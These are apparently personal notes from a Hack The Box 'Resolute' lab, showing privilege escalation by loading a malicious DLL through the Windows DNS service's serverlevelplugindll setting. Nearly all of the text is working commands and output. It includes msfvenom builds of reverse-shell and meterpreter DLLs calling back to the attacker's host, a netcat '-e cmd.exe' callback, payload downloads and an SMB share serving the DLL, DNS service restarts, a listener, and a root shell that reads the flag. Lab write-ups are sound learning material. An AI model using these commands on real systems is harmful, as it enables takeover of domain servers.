-a----        9/16/2023  11:02 AM              0 again.txt
-a----        9/16/2023  11:26 AM           9216 dnshack.dll
-a----        9/16/2023   9:48 AM              0 malicious.dll
-a----        9/16/2023  10:46 AM              0 malicious2.dll
-a----        9/16/2023  10:59 AM              0 malicious2.txt
-a----        9/16/2023  10:42 AM          59392 nc.exe
-a----        9/16/2023  11:25 AM          45272 nc64.exe
-a----        9/16/2023  10:05 AM              0 pwned.dll
-a----        9/16/2023  10:56 AM            959 resolute.gnmap
-a----        9/16/2023  10:12 AM              0 shell.exe
-a----        9/16/2023  10:14 AM          53624 shell2.exe
-a----        9/16/2023  10:19 AM              0 shell_x64.dll
-a----        9/16/2023  11:00 AM              0 tt.txt


*Evil-WinRM* PS C:\Users\ryan\Documents> 

kali msfvenom

└─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc64.exe 10.10.14.20 444 -e cmd.exe" -f dll > dnshack.dll

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 327 bytes
Final size of dll file: 9216 bytes

load and try again but fails

We will try meterpreter payload

m -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > final.dll
[sudo] password for kali: 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]

upload and load and verify

*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/final.dll -OutFile final.dll
-UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe 10.10.10.169 /config /serverlevelplugindll C:\Users\ryan\Documents\final.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : C:\Users\ryan\Documents\final.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry



*Evil-WinRM* PS C:\Users\ryan\Documents> 

stop and start dns while trying to catch on kali

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3504
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> 

wil try multi handler instead of nc

Kept failing.

restartd the machine and trying again

msfvenom

└─$ sudo msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f dll > reboot.dll
[sudo] password for kali: 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes

download the dll to the pc

*Evil-WinRM* PS C:\Users\ryan\Documents> Invoke-WebRequest -Uri http://10.10.14.20:8000/resolute.dll -OutFile resolute.dll -UseBasicParsing
*Evil-WinRM* PS C:\Users\ryan\Documents> ls


    Directory: C:\Users\ryan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/17/2023   3:17 AM           9216 reboot.dll


*Evil-WinRM* PS C:\Users\ryan\Documents> 


after a lot of murking around i gave up on the evil-wrm method of loading

from the evil-winrm prompt

new dll

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 --platform=windows -f dll > resolute.dll
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
                                                                                      
┌──(kali㉿kali)-[~/HTB/resolute]

will serve using smbserver.py

└─$ python3 ./smbserver.py share /home/kali/HTB/resolute/
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,52573)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)


load to dns -- dnscmd resolute.megabank.local /config /serverlevelplugindll \10.10.14.20\share\resolute.dll

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.14.20\share\resolute.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.stop dns
The term 'sc.stop' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ sc.stop dns
+ ~~~~~~~
    + CategoryInfo          : ObjectNotFound: (sc.stop:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 804
        FLAGS              :
*Evil-WinRM* PS C:\Users\ryan\Documents> 


metasploit listener

msf6 > use exploit/windows/x64/shell_reverse_tcp
[-] No results from search
[-] Failed to load module: exploit/windows/x64/shell_reverse_tcp
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > use exploit/windows/x64/shell_reverse_tcp
[-] No results from search
[-] Failed to load module: exploit/windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload exploit/windows/x64/shell_reverse_tcp
[-] The value specified for payload is not valid.
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.20LHOST => 10.10.14.20
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/shell_reverse_tcp):

   Name      Current Se  Required  Description
             tting
   ----      ----------  --------  -----------
   EXITFUNC  process     yes       Exit technique
                                    (Accepted: ''
                                   , seh, thread,
                                    process, none
                                   )
   LHOST     10.10.14.2  yes       The listen add
             0                     ress (an inter
                                   face may be sp
                                   ecified)
   LPORT     4444        yes       The listen por
                                   t


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit

we get in!!

[*] Started reverse TCP handler on 10.10.14.20:4444 
[*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.169:49850) at 2023-09-17 08:10:58 -0400


Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

C:\Windows\system32>ls

C:\Users\Administrator\Desktop>cat root.txt
cat root.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b0bd7a3c695fe7b68d3489ffd5f77848

C:\Users\Administrator\Desktop>